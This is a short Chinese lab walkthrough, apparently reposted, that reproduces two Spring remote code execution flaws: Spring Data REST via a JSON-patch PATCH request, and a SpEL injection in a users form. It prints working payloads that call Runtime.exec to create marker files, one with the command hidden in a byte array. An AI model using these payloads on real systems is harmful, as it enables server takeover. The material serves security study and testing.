目录

常见框架漏洞—Spring

一.Spring Data Rest 远程命令执⾏命令

1.搭建环境

2.访问网站下的/customers/1

3.对当前页面进行抓包,修改提交方式为PATCH,内容类型为application/json-patch+json

{ "op": "replace", "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte\[\]{116,111,117,99,104,32,47,116,109,112,47,115,117,99,99,101,115,101}))/lastname", "value": "vulhub" }

4.发现容器目录中有了succese

二.Spring代码执行

1.环境搭建

2.访问网站下的users目录

3.提交页面进行抓包,添加poc:
username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("t
ouch /tmp/crz")]=&password=&repeatedPassword=

4.查看终端,发现成功写入

本文是转载文章,点击查看原文
如有侵权,请联系 xyy@jishuzhan.net 删除
相关推荐
forestsea几秒前
Java 应用程序CPU 100%问题排查优化实战
java·开发语言
阿ฅ( ̳• ε • ̳)ฅ5 分钟前
C#窗体应用程序连接数据库
开发语言·数据库·c#
学习同学7 分钟前
C++进阶知识复习 1~15
java·开发语言·c++
凭君语未可8 分钟前
详解Maven的主要生命周期
java·log4j·maven
bing_15823 分钟前
JVM 类加载器在什么情况下会加载一个类?
java·jvm
冬天vs不冷2 小时前
EasyExcel导出自动回显中文,读取自动转换码值(基于全局转换器与自定义注解)
java·excel
阿里云云原生2 小时前
RAG 调优指南:Spring AI Alibaba 模块化 RAG 原理与使用
java·人工智能·spring
光军oi2 小时前
Mysql从入门到精通day5————子查询精讲
android·数据库·mysql
天上掉下来个程小白2 小时前
Redis-12.在Java中操作Redis-Spring Data Redis使用方式-操作字符串类型的数据
java·redis·spring·springboot·苍穹外卖
ん贤3 小时前
2023第十四届蓝桥杯大赛软件赛省赛C/C++ 大学 B 组(真题&题解)(C++/Java题解)
java·c语言·数据结构·c++·算法·蓝桥杯